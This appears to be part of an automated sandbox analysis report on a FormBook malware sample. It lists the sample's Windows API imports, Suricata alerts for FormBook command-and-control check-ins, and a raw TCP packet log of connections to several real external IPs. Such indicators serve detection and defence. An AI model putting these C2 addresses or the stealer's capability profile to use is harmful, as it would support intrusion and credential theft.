                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishGreat Britain

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-12-10T18:47:36.565238+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975884.32.84.3280TCP
                                                        2024-12-10T18:47:36.565238+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975684.32.84.3280TCP
                                                        2024-12-10T18:47:36.565238+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975784.32.84.3280TCP
                                                        2024-12-10T18:48:27.548312+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049755162.251.95.6280TCP
                                                        2024-12-10T18:48:51.684040+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204975984.32.84.3280TCP
                                                        2024-12-10T18:48:57.993871+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049760104.21.64.20880TCP
                                                        2024-12-10T18:49:00.644650+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049761104.21.64.20880TCP
                                                        2024-12-10T18:49:03.537440+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049762104.21.64.20880TCP
                                                        2024-12-10T18:49:06.152353+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049763104.21.64.20880TCP
                                                        2024-12-10T18:49:11.680216+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049764199.59.243.22780TCP
                                                        2024-12-10T18:49:14.391627+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049765199.59.243.22780TCP
                                                        2024-12-10T18:49:17.087577+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049766199.59.243.22780TCP
                                                        2024-12-10T18:49:19.805288+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049767199.59.243.22780TCP
                                                        2024-12-10T18:49:25.252644+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049768199.59.243.22780TCP
                                                        2024-12-10T18:49:27.908725+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049769199.59.243.22780TCP
                                                        2024-12-10T18:49:30.565792+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049770199.59.243.22780TCP
                                                        2024-12-10T18:49:33.220855+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049771199.59.243.22780TCP
                                                        2024-12-10T18:49:38.853215+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049772209.74.79.4180TCP
                                                        2024-12-10T18:49:41.539486+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049773209.74.79.4180TCP
                                                        2024-12-10T18:49:44.288907+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049774209.74.79.4180TCP
                                                        2024-12-10T18:49:47.014958+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049775209.74.79.4180TCP
                                                        2024-12-10T18:49:53.406218+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049776172.67.128.10980TCP
                                                        2024-12-10T18:49:56.072312+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049777172.67.128.10980TCP
                                                        2024-12-10T18:49:58.877370+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049778172.67.128.10980TCP
                                                        2024-12-10T18:50:01.276604+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049779172.67.128.10980TCP
                                                        2024-12-10T18:50:08.290020+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978047.83.1.9080TCP
                                                        2024-12-10T18:50:10.678387+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978147.83.1.9080TCP
                                                        2024-12-10T18:50:13.527999+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978247.83.1.9080TCP
                                                        2024-12-10T18:50:16.356830+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204978347.83.1.9080TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 10, 2024 18:48:26.922097921 CET4975580192.168.11.20162.251.95.62
                                                        Dec 10, 2024 18:48:27.231254101 CET8049755162.251.95.62192.168.11.20
                                                        Dec 10, 2024 18:48:27.231451988 CET4975580192.168.11.20162.251.95.62
                                                        Dec 10, 2024 18:48:27.238774061 CET4975580192.168.11.20162.251.95.62
                                                        Dec 10, 2024 18:48:27.547544956 CET8049755162.251.95.62192.168.11.20
                                                        Dec 10, 2024 18:48:27.547852993 CET8049755162.251.95.62192.168.11.20
                                                        Dec 10, 2024 18:48:27.548311949 CET4975580192.168.11.20162.251.95.62
                                                        Dec 10, 2024 18:48:27.550767899 CET4975580192.168.11.20162.251.95.62
                                                        Dec 10, 2024 18:48:27.860404015 CET8049755162.251.95.62192.168.11.20
                                                        Dec 10, 2024 18:48:42.794322014 CET4975680192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:43.046418905 CET804975684.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:43.046765089 CET4975680192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:43.057383060 CET4975680192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:43.309845924 CET804975684.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:43.310409069 CET804975684.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:45.575634956 CET4975780192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:45.828528881 CET804975784.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:45.828840971 CET4975780192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:45.839210987 CET4975780192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:46.092705011 CET804975784.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:46.092750072 CET804975784.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:48.372076988 CET4975880192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:48.628273964 CET804975884.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:48.628542900 CET4975880192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:48.639307976 CET4975880192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:48.639369965 CET4975880192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:48.895965099 CET804975884.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:48.896923065 CET804975884.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:48.897425890 CET804975884.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:48.897860050 CET804975884.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:48.911663055 CET804975884.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.168137074 CET4975980192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:51.422499895 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.422799110 CET4975980192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:51.429709911 CET4975980192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:51.683720112 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.683777094 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.683813095 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.683846951 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.684040070 CET4975980192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:51.684216022 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.684262037 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.684295893 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.684328079 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.684359074 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.684390068 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.684423923 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.684566975 CET4975980192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:51.684629917 CET4975980192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:51.937982082 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.942658901 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.942975998 CET4975980192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:51.951308966 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.960690022 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.961015940 CET4975980192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:51.968919039 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.977854013 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.978044987 CET4975980192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:51.987263918 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.995893955 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:51.996172905 CET4975980192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:52.004867077 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:52.013477087 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:52.013803005 CET4975980192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:52.015691996 CET4975980192.168.11.2084.32.84.32
                                                        Dec 10, 2024 18:48:52.269640923 CET804975984.32.84.32192.168.11.20
                                                        Dec 10, 2024 18:48:57.182619095 CET4976080192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:48:57.325613976 CET8049760104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:48:57.325881958 CET4976080192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:48:57.336606979 CET4976080192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:48:57.480201006 CET8049760104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:48:57.993571043 CET8049760104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:48:57.993618011 CET8049760104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:48:57.993652105 CET8049760104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:48:57.993870974 CET4976080192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:48:58.852010012 CET4976080192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:48:59.869529963 CET4976180192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:00.147103071 CET8049761104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:00.147295952 CET4976180192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:00.157560110 CET4976180192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:00.434912920 CET8049761104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:00.644364119 CET8049761104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:00.644411087 CET8049761104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:00.644649982 CET4976180192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:00.644817114 CET8049761104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:00.644985914 CET4976180192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:01.663906097 CET4976180192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:02.681243896 CET4976280192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:02.823822021 CET8049762104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:02.823993921 CET4976280192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:02.834871054 CET4976280192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:02.834920883 CET4976280192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:02.978197098 CET8049762104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:02.978658915 CET8049762104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:02.978699923 CET8049762104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:02.978780031 CET8049762104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:02.979245901 CET8049762104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:02.979617119 CET8049762104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:03.537161112 CET8049762104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:03.537204981 CET8049762104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:03.537440062 CET4976280192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:03.537893057 CET8049762104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:03.538130045 CET4976280192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:04.350819111 CET4976280192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:05.368191004 CET4976380192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:05.549746990 CET8049763104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:05.549956083 CET4976380192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:05.556551933 CET4976380192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:05.738338947 CET8049763104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:06.151998997 CET8049763104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:06.152045965 CET8049763104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:06.152353048 CET4976380192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:06.152523994 CET8049763104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:06.152739048 CET4976380192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:06.155498981 CET4976380192.168.11.20104.21.64.208
                                                        Dec 10, 2024 18:49:06.337232113 CET8049763104.21.64.208192.168.11.20
                                                        Dec 10, 2024 18:49:11.416054964 CET4976480192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:11.533766985 CET8049764199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:11.533993006 CET4976480192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:11.544217110 CET4976480192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:11.662580013 CET8049764199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:11.680057049 CET8049764199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:11.680104971 CET8049764199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:11.680138111 CET8049764199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:11.680216074 CET4976480192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:11.680260897 CET4976480192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:11.683856010 CET8049764199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:11.684075117 CET4976480192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:13.052076101 CET4976480192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:14.069454908 CET4976580192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:14.231143951 CET8049765199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:14.231470108 CET4976580192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:14.241945028 CET4976580192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:14.391386032 CET8049765199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:14.391400099 CET8049765199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:14.391627073 CET4976580192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:14.391669989 CET8049765199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:14.391921997 CET4976580192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:15.754776001 CET4976580192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:16.772305012 CET4976680192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:16.915072918 CET8049766199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:16.915277958 CET4976680192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:16.925659895 CET4976680192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:16.925740957 CET4976680192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:17.067076921 CET8049766199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:17.067102909 CET8049766199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:17.068233967 CET8049766199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:17.069225073 CET8049766199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:17.069250107 CET8049766199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:17.070066929 CET8049766199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:17.070091963 CET8049766199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:17.087289095 CET8049766199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:17.087317944 CET8049766199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:17.087338924 CET8049766199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:17.087577105 CET4976680192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:17.091638088 CET8049766199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:17.091851950 CET4976680192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:18.441606998 CET4976680192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:19.458914995 CET4976780192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:19.627521038 CET8049767199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:19.627731085 CET4976780192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:19.634412050 CET4976780192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:19.804872990 CET8049767199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:19.804924965 CET8049767199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:19.804956913 CET8049767199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:19.805288076 CET4976780192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:19.807085037 CET4976780192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:19.975976944 CET8049767199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:24.988619089 CET4976880192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:25.105890036 CET8049768199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:25.106142044 CET4976880192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:25.116887093 CET4976880192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:25.235052109 CET8049768199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:25.252270937 CET8049768199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:25.252481937 CET8049768199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:25.252497911 CET8049768199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:25.252644062 CET4976880192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:25.258913994 CET8049768199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:25.259053946 CET4976880192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:26.627259970 CET4976880192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:27.644726992 CET4976980192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:27.762325048 CET8049769199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:27.762495041 CET4976980192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:27.773057938 CET4976980192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:27.890408993 CET8049769199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:27.908334970 CET8049769199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:27.908508062 CET8049769199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:27.908519030 CET8049769199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:27.908725023 CET4976980192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:27.915602922 CET8049769199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:27.915818930 CET4976980192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:29.282892942 CET4976980192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:30.300375938 CET4977080192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:30.418026924 CET8049770199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:30.418205023 CET4977080192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:30.428957939 CET4977080192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:30.429029942 CET4977080192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:30.429053068 CET4977080192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:30.546652079 CET8049770199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:30.546837091 CET8049770199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:30.547107935 CET8049770199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:30.547379971 CET8049770199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:30.547620058 CET8049770199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:30.547894955 CET8049770199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:30.548103094 CET8049770199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:30.565650940 CET8049770199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:30.565660000 CET8049770199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:30.565666914 CET8049770199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:30.565792084 CET4977080192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:30.573139906 CET8049770199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:30.573414087 CET4977080192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:31.938597918 CET4977080192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:32.956016064 CET4977180192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:33.078391075 CET8049771199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:33.078702927 CET4977180192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:33.085243940 CET4977180192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:33.202769041 CET8049771199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:33.220235109 CET8049771199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:33.220467091 CET8049771199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:33.220477104 CET8049771199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:33.220854998 CET4977180192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:33.222763062 CET4977180192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:33.226931095 CET8049771199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:33.227092981 CET4977180192.168.11.20199.59.243.227
                                                        Dec 10, 2024 18:49:33.340040922 CET8049771199.59.243.227192.168.11.20
                                                        Dec 10, 2024 18:49:38.475107908 CET4977280192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:38.653822899 CET8049772209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:38.654119968 CET4977280192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:38.664721966 CET4977280192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:38.843254089 CET8049772209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:38.852972984 CET8049772209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:38.852982998 CET8049772209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:38.853214979 CET4977280192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:40.171142101 CET4977280192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:41.188738108 CET4977380192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:41.355765104 CET8049773209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:41.356007099 CET4977380192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:41.366607904 CET4977380192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:41.533685923 CET8049773209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:41.539340019 CET8049773209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:41.539350033 CET8049773209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:41.539485931 CET4977380192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:42.873651981 CET4977380192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:43.891140938 CET4977480192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:44.098618984 CET8049774209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:44.098937988 CET4977480192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:44.109718084 CET4977480192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:44.109740019 CET4977480192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:44.277419090 CET8049774209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:44.277430058 CET8049774209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:44.277720928 CET8049774209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:44.277941942 CET8049774209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:44.278151989 CET8049774209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:44.278882980 CET8049774209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:44.288527966 CET8049774209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:44.288641930 CET8049774209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:44.288907051 CET4977480192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:45.623086929 CET4977480192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:46.642649889 CET4977580192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:46.833719015 CET8049775209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:46.833935022 CET4977580192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:46.840627909 CET4977580192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:47.007555008 CET8049775209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:47.014662027 CET8049775209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:47.014683008 CET8049775209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:47.014957905 CET4977580192.168.11.20209.74.79.41
